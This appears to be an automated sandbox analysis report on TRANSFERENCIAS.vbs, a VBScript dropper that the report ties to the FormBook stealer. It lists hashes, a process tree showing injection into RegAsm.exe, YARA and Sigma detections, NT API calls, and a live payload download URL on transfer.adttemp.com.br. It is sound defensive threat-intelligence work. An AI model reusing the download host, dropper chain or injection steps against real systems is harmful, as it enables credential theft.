Edit tour

Windows Analysis Report
TRANSFERENCIAS.vbs

Overview

General Information

Sample name:	TRANSFERENCIAS.vbs
Analysis ID:	1525549
MD5:	b378b2b63f8ee49548ea6e851b601321
SHA1:	8910d7499ed420934921e4407e18bdf92cc5bbae
SHA256:	c7da43b1032582ef7d03c48e749bbb56b18d2da5360a29341ada35ce67900e2e
Tags:	vbsuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Potential malicious VBS script found (has network functionality)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6504 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

temp_executable.exe (PID: 5620 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: 4BB2987F85F87A6488CE3152D6B85077)

RegAsm.exe (PID: 6648 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c1b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1425f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16542:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", ProcessId: 6504, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs", ProcessId: 6504, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:49704 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.2086216650.000001615D7A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2054204916.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082243144.000001615D7C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082427583.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2086853744.000001615E450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083593147.000001615D7A7000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2058303544.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Potential malicious VBS script found (has network functionality)

Source:

Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file

Source: global traffic

HTTP traffic detected: GET /Io2SD/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /Io2SD/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: transfer.adttemp.com.br

Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.brd
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003227000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2058303544.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr	String found in binary or memory: https://transfer.adttemp.com.br/Io2SD/sirdeeeeee.txt

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:49704 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042C563 NtClose,	3_2_0042C563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC35C0 NtCreateMutant,LdrInitializeThunk,	3_2_02CC35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_02CC2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_02CC2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC4340 NtSetContextThread,	3_2_02CC4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3090 NtSetValueKey,	3_2_02CC3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3010 NtOpenDirectoryObject,	3_2_02CC3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC4650 NtSuspendThread,	3_2_02CC4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2AD0 NtReadFile,	3_2_02CC2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2AF0 NtWriteFile,	3_2_02CC2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2AB0 NtWaitForSingleObject,	3_2_02CC2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2BE0 NtQueryValueKey,	3_2_02CC2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2BF0 NtAllocateVirtualMemory,	3_2_02CC2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2B80 NtQueryInformationFile,	3_2_02CC2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2BA0 NtEnumerateValueKey,	3_2_02CC2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2B60 NtClose,	3_2_02CC2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC39B0 NtGetContextThread,	3_2_02CC39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2EE0 NtQueueApcThread,	3_2_02CC2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2E80 NtReadVirtualMemory,	3_2_02CC2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2EA0 NtAdjustPrivilegesToken,	3_2_02CC2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2E30 NtWriteVirtualMemory,	3_2_02CC2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2FE0 NtCreateFile,	3_2_02CC2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2F90 NtProtectVirtualMemory,	3_2_02CC2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2FA0 NtQuerySection,	3_2_02CC2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2FB0 NtResumeThread,	3_2_02CC2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2F60 NtCreateProcessEx,	3_2_02CC2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2F30 NtCreateSection,	3_2_02CC2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2CC0 NtQueryVirtualMemory,	3_2_02CC2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2CF0 NtOpenProcess,	3_2_02CC2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2CA0 NtQueryInformationToken,	3_2_02CC2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2C60 NtCreateKey,	3_2_02CC2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2C00 NtQueryInformationProcess,	3_2_02CC2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2DD0 NtDelayExecution,	3_2_02CC2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2DB0 NtEnumerateKey,	3_2_02CC2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3D70 NtOpenThread,	3_2_02CC3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2D00 NtSetInformationFile,	3_2_02CC2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3D10 NtOpenProcessToken,	3_2_02CC3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2D10 NtMapViewOfSection,	3_2_02CC2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2D30 NtUnmapViewOfSection,	3_2_02CC2D30

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_02FA3558	2_2_02FA3558
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_02FA1930	2_2_02FA1930
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_02FA354B	2_2_02FA354B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402350	3_2_00402350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042EB83	3_2_0042EB83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FCFB	3_2_0040FCFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404486	3_2_00404486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FD03	3_2_0040FD03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402E60	3_2_00402E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004166B3	3_2_004166B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FF23	3_2_0040FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DFA3	3_2_0040DFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D503E6	3_2_02D503E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD739A	3_2_02CD739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4A352	3_2_02D4A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D34C	3_2_02C7D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4132D	3_2_02D4132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F0CC	3_2_02D3F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4F0E0	3_2_02D4F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D470E9	3_2_02D470E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D481CC	3_2_02D481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9B1B0	3_2_02C9B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D501AA	3_2_02D501AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC516C	3_2_02CC516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B16B	3_2_02D5B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80100	3_2_02C80100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAC6E0	3_2_02CAC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8C7C0	3_2_02C8C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4F7B0	3_2_02D4F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB4750	3_2_02CB4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3E4F6	3_2_02D3E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D42446	3_2_02D42446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C81460	3_2_02C81460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4F43F	3_2_02D4F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D50591	3_2_02D50591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2D5B0	3_2_02D2D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D47571	3_2_02D47571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90535	3_2_02C90535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3DAC6	3_2_02D3DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8EA80	3_2_02C8EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD5AA0	3_2_02CD5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2DAAC	3_2_02D2DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D47A46	3_2_02D47A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FA49	3_2_02D4FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D03A6C	3_2_02D03A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D46BD7	3_2_02D46BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CCDBF9	3_2_02CCDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAFB80	3_2_02CAFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4AB40	3_2_02D4AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FB76	3_2_02D4FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C938E0	3_2_02C938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBE8F0	3_2_02CBE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C768B8	3_2_02C768B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C92840	3_2_02C92840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9A840	3_2_02C9A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD800	3_2_02CFD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C929A0	3_2_02C929A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5A9A6	3_2_02D5A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C99950	3_2_02C99950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB950	3_2_02CAB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA6962	3_2_02CA6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4EEDB	3_2_02D4EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4CE93	3_2_02D4CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA2E90	3_2_02CA2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C99EB0	3_2_02C99EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90E59	3_2_02C90E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4EE26	3_2_02D4EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C82FC8	3_2_02C82FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9CFE0	3_2_02C9CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91F92	3_2_02C91F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FFB1	3_2_02D4FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D04F40	3_2_02D04F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FF09	3_2_02D4FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD2F28	3_2_02CD2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB0F30	3_2_02CB0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FCF2	3_2_02D4FCF2
